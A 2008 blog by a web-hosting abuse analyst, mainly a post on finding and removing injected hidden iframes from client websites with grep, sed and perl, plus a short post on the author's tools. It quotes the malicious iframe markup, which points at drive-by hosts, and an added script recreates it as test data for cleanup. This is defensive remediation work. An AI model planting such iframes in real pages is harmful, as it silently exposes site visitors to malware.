Wednesday, November 26, 2008

Cleaning Iframe Injections, Lesson 1

Pretty often we get complaints that Google has marked a site as malicious. Usually this is an iframe injection, like 90% of the time. Sometimes it's a PHP shell, but that's another blog entry. The first step is to grab the page. Please use curl or wget for this. You COULD just surf to it, but we're security professionals, right?

You'll find something like this:

<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Or:

<iframe src="http://pinoc.org/count.php?o=2" </iframe>
<iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Or:

<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://yahoo-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


Here's a handy perl one-liner for the pinoc domains (courtesy of http://blog.floogy.com/2008/08/fix-pinocorg-and-pinocinfo.html thanks!):

find /PATH/TO/START/FROM/ -type f | xargs perl -pi -e 's/\<iframe src\=\"http\:\/\/pinoc\.info\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>\<iframe src\=\"http\:\/\/pinoc\.org\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>//g'

To remove using sed instead:

First we make a grep string that catches all of the iframes. I like egrep:

From:

<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

To:

grep -HRE "<iframe src=\"http:\/\/google-analyze\.org\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>"

Note that the only difference between the strings is the domain they access. The requested file (count.php?o=2) and all of the attributes are the same. We use this to clean everything at once.

grep -HRE "<iframe src=\"http:\/\/[^\"]*\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>" /home/user/*

This should find ALL of the injections. Be sure to redirect the output to a text file for later. The option -lRE should make grep spit out just the names of files. Now we build our sed-line:

sed "s/<iframe src=\"http:\/\/[^\"]*\/count\.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"

And attach it to our list (you DID make a list of filenames by using -lRE for grep and redirecting the output, right?):

cat ~/thelist.txt | xargs sed "s/<iframe src=\"http:\/\/[^\"]*\/count\.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"

This feeds thelist.txt into xargs, and xargs runs the sed-line on every file in thelist.txt. Be sure to fix any paths with spaces or sed will break. If we're lucky, this should result in a clean home directory for your client :). If we aren't, well, hope you backed them up first! sed can make that backup for us: add -i.ext to the command and it writes the original of every edited file to filename.ext before changing it:

cat ~/thelist.txt | xargs sed -i.shanbak "s/<iframe src=\"http:\/\/[^\"]*\/count\.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"


I use shanbak in case the client has other .bak files. This makes cleaning up the backups after you've verified the iframes are gone a piece of cake and less hazardous to your client backups.
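The whole grep -> file list -> sed -i.shanbak -> verify procedure above, wrapped into one shell function. This is an added example, not code from the original post; it assumes GNU grep and GNU sed, and make_sample builds a constructed web root with the injected markup from this post (plus a path with a space in it) to run against.

```shell
#!/bin/sh
# Added example (not from the original post): the grep -> file list -> sed -i.shanbak
# cleanup as one function. Two tightenings over the one-liners in the post:
#  * the domain wildcard is [^"]* instead of .*, so a greedy match cannot swallow
#    legitimate markup sitting between two injected iframes on the same line;
#  * file names travel NUL-separated (grep -Z / xargs -0), so paths containing
#    spaces no longer break the sed step.
# Assumes GNU grep and GNU sed.

# BRE for the injected iframe. As the post observes, only the domain varies between
# infections, so that is the only wildcard. '|' is the sed delimiter below, so the
# slashes need no escaping here.
IFRAME_RE='<iframe src="http://[^"]*/count\.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'

# make_sample DIR: constructed test data, a web root with two infected pages
# (one under a directory with a space in its name) and one clean page.
make_sample() {
    mkdir -p "$1/my site"
    printf '<p>Hello</p>%s<p>World</p>\n' \
        '<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>' \
        > "$1/index.html"
    # two injected iframes on one line with real content between them
    printf '%s<a href="http://example.invalid/">keep me</a>%s\n' \
        '<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>' \
        '<iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>' \
        > "$1/my site/page.html"
    printf '<p>nothing to see</p>\n' > "$1/clean.html"
}

# clean_iframes DIR LISTFILE: write the names of infected files to LISTFILE (the
# list the post tells you to keep), strip the iframe in place leaving a .shanbak
# copy of every touched file, then re-scan the live files; returns non-zero if
# any injection survives. Backups are excluded from both scans so a re-run
# never edits them.
clean_iframes() {
    dir=$1; list=$2
    grep -lRZ --exclude='*.shanbak' "$IFRAME_RE" "$dir" > "$list.z" || true
    tr '\0' '\n' < "$list.z" > "$list"      # readable copy of the file list
    if [ -s "$list.z" ]; then
        xargs -0 sed -i.shanbak "s|$IFRAME_RE||g" < "$list.z"
    fi
    rm -f "$list.z"
    ! grep -R --exclude='*.shanbak' -q "$IFRAME_RE" "$dir"
}
```

Once clean_iframes returns 0 and you have eyeballed a few pages, `find DIR -name '*.shanbak' -delete` removes the backups, exactly as the post describes.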

ich1 out.

Saturday, November 22, 2008

Schools and Tools

Let's get the preliminaries out of the way:

My name is Shannon Francis, I'm a Computer Science student at a university in Florida. I also work for a web hosting company as an Abuse and Security Analyst. We get to see lots of interesting things and lots of boring, annoying ones, so I'm choosing to blog about them here.

I figure if I fix something and post about it, if someone somewhere finds it and it saves them a bit of time, I've done a mitzvah.

First, let's talk about tools.

I do most of my work from a Windows XP machine. I can hear everyone out there tuning out, but bear with me. I work in an office environment and at any time may need to work from more than one computer that isn't my workstation. I chose my tools such that they match up with the majority of the boxes in the office and so that they would easily fit on a thumb drive for maximum portability and minimal hassle. I'm lazy like that :).

We use XMPP at work so I use pidgin (and OTR for encryption) to communicate with co-workers. I use Putty Connection Manager to SSH into servers and open more than one session at a time without cluttering my laptop (that's right, laptop :) too much. I use TrueCrypt to encrypt the drive storing my SSH keys and other important passwords and such. Can't overlook the importance of on-the-fly encryption, especially when you need to remain mobile (leaving valid SSH keys around is just tacky).

Sam Spade comes in handy for just about everything you could need to do before you SSH into a *nix server. I can ping, whois, dig, traceroute, etc., and we have a VPS set up at work for any *nix-y tasks we need to do from the outside of the server we're investigating. I use zenmap as opposed to plain old vanilla nmap (more people just tuned out, probably), mostly because it's what is easy and available in the Windows office environment, but honestly I don't have to use it that often.

Next post I'll talk about what command-line tools I use most and how for the first part of my job: finding the problem.

Saturday, November 15, 2008

Welcome to the Sprawl....

Abandon hope all ye who enter here....